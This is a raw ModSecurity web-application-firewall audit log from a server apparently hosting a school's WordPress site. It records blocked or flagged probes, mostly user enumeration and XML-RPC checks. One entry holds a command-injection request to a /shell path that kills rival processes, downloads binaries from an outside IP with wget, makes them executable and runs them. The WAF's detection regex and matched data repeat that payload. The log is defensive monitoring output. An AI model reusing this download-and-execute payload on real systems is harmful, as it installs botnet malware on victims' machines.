p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abb1e547-Z-- --62386a01-A-- [04/May/2025:11:48:08 +0700] aBbxiGJEE9ao5dcyYWnvLQAAAJA 103.236.140.4 37282 103.236.140.4 8181 --62386a01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62386a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62386a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746334088454957 3220 (- - -) Stopwatch2: 1746334088454957 3220; combined=1425, p1=492, p2=900, p3=0, p4=0, p5=33, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62386a01-Z-- --1d4d6b0a-A-- [04/May/2025:11:48:15 +0700] aBbxj_nZiHJYHUAF8Qfc6QAAABA 103.236.140.4 37286 103.236.140.4 8181 --1d4d6b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1d4d6b0a-C-- demo.sayHello --1d4d6b0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4d6b0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746334095758168 5086 (- - -) Stopwatch2: 1746334095758168 5086; combined=3835, p1=469, p2=3182, p3=19, p4=22, p5=83, sr=68, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4d6b0a-Z-- --4446ea51-A-- [04/May/2025:12:04:15 +0700] aBb1T_nZiHJYHUAF8Qfc9wAAABY 103.236.140.4 37376 103.236.140.4 8181 --4446ea51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4446ea51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4446ea51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746335055147769 2895 (- - -) Stopwatch2: 1746335055147769 2895; combined=1259, p1=462, p2=767, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4446ea51-Z-- --6a98aa6b-A-- [04/May/2025:12:04:22 +0700] aBb1VtsVQyl9V2B8Pt-xHwAAAFc 103.236.140.4 37380 103.236.140.4 8181 --6a98aa6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a98aa6b-C-- demo.sayHello --6a98aa6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a98aa6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746335062132811 5304 (- - -) Stopwatch2: 1746335062132811 5304; combined=3952, p1=533, p2=3204, p3=29, p4=33, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a98aa6b-Z-- --bf70c946-A-- [04/May/2025:12:16:41 +0700] aBb4OfnZiHJYHUAF8QfgJwAAAAY 103.236.140.4 48628 103.236.140.4 8181 --bf70c946-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf70c946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf70c946-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746335801941911 3271 (- - -) Stopwatch2: 1746335801941911 3271; combined=1454, p1=483, p2=940, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf70c946-Z-- --a8522303-A-- [04/May/2025:12:16:47 +0700] aBb4P_nZiHJYHUAF8QfgKAAAAAc 103.236.140.4 48632 103.236.140.4 8181 --a8522303-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8522303-C-- demo.sayHello --a8522303-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8522303-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746335807508576 16796 (- - -) Stopwatch2: 1746335807508576 16796; combined=27288, p1=469, p2=3261, p3=29, p4=40, p5=11758, sr=69, sw=62, l=0, gc=11669 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8522303-Z-- --9db4b254-A-- [04/May/2025:12:39:51 +0700] aBb9p_nZiHJYHUAF8QfgOwAAAA4 103.236.140.4 48912 103.236.140.4 8181 --9db4b254-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9db4b254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db4b254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746337191387739 3257 (- - -) Stopwatch2: 1746337191387739 3257; combined=1430, p1=496, p2=900, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db4b254-Z-- --4cb33844-A-- [04/May/2025:12:39:58 +0700] aBb9rtsVQyl9V2B8Pt-9EgAAAFg 103.236.140.4 48916 103.236.140.4 8181 --4cb33844-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cb33844-C-- demo.sayHello --4cb33844-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb33844-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746337198121624 5931 (- - -) Stopwatch2: 1746337198121624 5931; combined=4347, p1=600, p2=3508, p3=31, p4=35, p5=101, sr=82, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb33844-Z-- --07258404-A-- [04/May/2025:13:15:29 +0700] aBcGAWJEE9ao5dcyYWnwfgAAAI4 103.236.140.4 49222 103.236.140.4 8181 --07258404-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07258404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07258404-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339329270648 2505 (- - -) Stopwatch2: 1746339329270648 2505; combined=1042, p1=339, p2=680, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07258404-Z-- --9c067455-A-- [04/May/2025:13:15:34 +0700] aBcGBuchPF6irSergtv9uQAAAMk 103.236.140.4 49226 103.236.140.4 8181 --9c067455-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c067455-C-- demo.sayHello --9c067455-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c067455-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746339334549394 5921 (- - -) Stopwatch2: 1746339334549394 5921; combined=4290, p1=595, p2=3468, p3=28, p4=32, p5=98, sr=130, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c067455-Z-- --76ec9620-A-- [04/May/2025:13:24:11 +0700] aBcIC9sVQyl9V2B8Pt-9NAAAAE4 103.236.140.4 49278 103.236.140.4 8181 --76ec9620-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76ec9620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ec9620-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339851789361 2903 (- - -) Stopwatch2: 1746339851789361 2903; combined=1254, p1=440, p2=784, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ec9620-Z-- --93388d64-A-- [04/May/2025:13:25:14 +0700] aBcISuchPF6irSergtv9wQAAANg 103.236.140.4 49288 103.236.140.4 8181 --93388d64-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --93388d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93388d64-E-- --93388d64-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746339914036927 2501 (- - -) Stopwatch2: 1746339914036927 2501; combined=791, p1=486, p2=266, p3=0, p4=0, p5=38, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93388d64-Z-- --f2d91f0a-A-- [04/May/2025:13:26:59 +0700] aBcIs_nZiHJYHUAF8QfgXAAAABQ 103.236.140.4 49354 103.236.140.4 8181 --f2d91f0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2d91f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2d91f0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746340019280369 2330 (- - -) Stopwatch2: 1746340019280369 2330; combined=979, p1=329, p2=629, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2d91f0a-Z-- --af620465-A-- [04/May/2025:13:27:02 +0700] aBcItvnZiHJYHUAF8QfgXgAAAAA 103.236.140.4 49370 103.236.140.4 8181 --af620465-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af620465-C-- demo.sayHello --af620465-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af620465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746340022609974 5707 (- - -) Stopwatch2: 1746340022609974 5707; combined=4162, p1=572, p2=3352, p3=33, p4=45, p5=95, sr=85, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af620465-Z-- --888d3518-A-- [04/May/2025:13:43:29 +0700] aBcMkWJEE9ao5dcyYWnxIgAAAIQ 103.236.140.4 50508 103.236.140.4 8181 --888d3518-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --888d3518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --888d3518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341009696669 2607 (- - -) Stopwatch2: 1746341009696669 2607; combined=1363, p1=463, p2=865, p3=0, p4=0, p5=35, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --888d3518-Z-- --f444d55f-A-- [04/May/2025:13:43:34 +0700] aBcMlmJEE9ao5dcyYWnxJAAAAIo 103.236.140.4 50512 103.236.140.4 8181 --f444d55f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f444d55f-C-- demo.sayHello --f444d55f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f444d55f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
